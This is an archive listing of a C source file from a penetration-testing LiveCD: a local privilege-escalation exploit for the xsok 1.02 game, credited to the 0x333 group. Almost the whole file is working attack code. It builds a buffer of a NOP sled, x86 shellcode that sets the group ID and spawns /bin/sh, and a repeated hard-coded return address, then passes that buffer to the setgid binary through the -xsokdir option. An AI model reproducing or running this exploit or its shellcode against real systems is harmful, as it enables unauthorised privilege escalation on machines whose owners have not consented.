home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / 0x333xsok.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  997b  |  48 lines
  1. /* 0x333xsok (2) => xsok 1.02 local game exploit
  2.  *
  3.  *  Happy new year ! (2 :)
  4.  *  coded by c0wboy 
  5.  *
  6.  *  (c) 0x333 Outsiders Security Labs / www.0x333.org
  7.  *
  8.  */
  9.  
  10.  
  11. #include <stdio.h>
  12. #include <unistd.h>
  13.  
  14. #define BIN     "/usr/games/xsok"
  15. #define RETADD  0xbffffa3c
  16. #define SIZE    200
  17.  
  18.  
  19. unsigned char shellcode[] =
  20.  
  21.     /* setregid (20,20) shellcode */
  22.     "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
  23.     "\xcd\x80"
  24.  
  25.     /* exec /bin/sh shellcode */
  26.     "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
  27.     "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
  28.  
  29.  
  30.     
  31. int main (int argc, char ** argv)
  32. {
  33.     int i, ret = RETADD;
  34.     char out[SIZE];
  35.  
  36.     fprintf(stdout, "\n ---   0x333xsok => xsok 1.02 local games exploit   ---\n");
  37.     fprintf(stdout, "   ---       Outsiders Se(c)urity Labs 2003       ---\n\n");
  38.  
  39.     int *xsok = (int *)(out);
  40.  
  41.     for (i=0; i<SIZE-1 ; i+=4, *xsok++ = ret);
  42.  
  43.     memset((char *)out, 0x90, 63);
  44.     memcpy((char *)out+63, shellcode, strlen(shellcode));
  45.  
  46.     execl (BIN, BIN, "-xsokdir", out, 0x0);
  47. }
  48.